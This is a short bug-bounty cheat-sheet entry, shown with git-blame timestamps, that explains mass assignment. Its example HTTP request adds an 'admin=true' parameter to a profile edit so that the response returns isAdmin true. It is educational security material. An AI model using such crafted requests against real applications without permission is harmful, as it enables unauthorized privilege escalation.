AllAboutBugBounty/Mass Assignment.md

40 lines
808 B
Markdown
Raw Normal View History

2021-02-09 10:29:07 +00:00
# Mass Assignment Attack
2022-06-15 10:38:42 +00:00
2021-02-09 10:29:07 +00:00
## Introduction
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
2022-06-15 10:38:42 +00:00
## How to exploit
2021-02-09 10:29:07 +00:00
- Normal request
```
POST /editdata HTTP/1.1
Host: target.com
...
2021-02-09 10:29:07 +00:00
username=daffa
```
The response
2021-02-09 10:29:07 +00:00
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"false"}
2021-02-09 10:29:07 +00:00
```
- Modified Request
```
POST /editdata HTTP/1.1
Host: target.com
...
2021-02-09 10:29:07 +00:00
username=daffa&admin=true
```
```
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"true"}
2022-06-15 10:38:42 +00:00
```
## References
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)